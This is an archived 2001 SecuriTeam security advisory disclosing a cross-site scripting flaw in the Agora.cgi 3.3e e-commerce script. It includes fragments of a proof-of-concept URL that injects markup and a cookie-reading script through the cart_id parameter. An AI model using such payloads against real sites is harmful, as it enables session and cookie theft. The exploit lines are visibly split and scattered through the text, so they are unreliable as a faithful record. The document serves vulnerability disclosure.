[UNIX] Agoracgi Cross-Site Scripting Vulnerability
From: support@securiteam.comDate: 12/23/01
- Previous message: support@securiteam.com: "[NT] MSIE May Download and Run Programs Automatically"
- Messages sorted by: [ date ] [ thread ] [ subject ] [ author ] [ attachment ]
From: support@securiteam.com To: list@securiteam.com Date: Sun, 23 Dec 2001 04:48:05 +0100 (CET)
The following security advisory is sent to the securiteam mailing list, and can be found at the SecuriTeam web site: http://www.securiteam.com
- - promotion
When was the last time you checked your server's security?
How about a monthly report?
http://www.AutomatedScanning.com - Know that you're safe.
- - - - - - - - -
Agoracgi Cross-Site Scripting Vulnerability
------------------------------------------------------------------------
SUMMARY
<http://www.agoracgi.com/> Agora.cgi is an open source ecommerce
solution. A security vulnerability in the product allows attackers to
insert malicious content into existing web pages by exploiting the
Cross-Site Scripting Vulnerability.
DETAILS
Vulnerable systems:
Agoracgi version 3.3e
Exploit:
http://www.example.com/store/agora.cgi?cart_id= ADDITIONAL INFORMATION
The information has been provided by <mailto:ts@securityoffice.net> Tamer
========================================
This bulletin is sent to members of the SecuriTeam mailing list.
====================
DISCLAIMER:
(NOTE, The letter 'I' in the word SCRIPT has been replaced with an '!' to
prevent the script from being active)
http://www.example.com/store/agora.cgi?cart_id=
="http://www.securityoffice.net/images/title.gif"%20width=406%20border
=0>&xm=on&product=HTML
cookie)</script>&xm=on&product=HTML
Sahin.
To unsubscribe from the list, send mail with an empty subject line and body to: list-unsubscribe@securiteam.com
In order to subscribe to the mailing list, simply forward this email to: list-subscribe@securiteam.com
====================
The information in this bulletin is provided "AS IS" without warranty of any kind.
In no event shall we be liable for any damages whatsoever including direct, indirect, incidental, consequential, loss of business profits or special damages.
Relevant Pages
... SecurityFocus Microsoft Newsletter #91 ... Multiple Bugzilla Security Vulnerabilities ... Geeklog pid CGI Variable SQL Injection Vulnerability ... Geeklog Calendar Event Form Script Injection Vulnerability ...
(Focus-Microsoft)
... Get your security news from a reliable source. ... Vulnerability in ASP.NET 2.0 Allows Information Disclosure ... side script in the user's browser. ... Microsoft Windows Server 2003 for Itanium-based Systems or Windows ...
(Securiteam)
... I wonder why we can't find Aditya K Sood in any of the security list even though he has made so many public disclosures. ... Subject: SecNiche: Microsoft Internet Explorer Pop up Blocker Bypassing and Dos Vulnerability ... I don't see anything in the script that can bypass zone security and run ... drawn conclusion that the script can execute from internet zone. ...
(Full-Disclosure)
... Get your security news from a reliable source. ... This vulnerability allows a malicious user set himself any user level he ... "msg" with a value of any script you would like to be run. ... An injection vulnerability exists in forums.asp. ...
(Securiteam)
... Get your security news from a reliable source. ... these services because of certain flaws in their anti-scripting filters. ... Second vulnerability: ... This service is also susceptible to a script insertion method previously ...
(Securiteam)
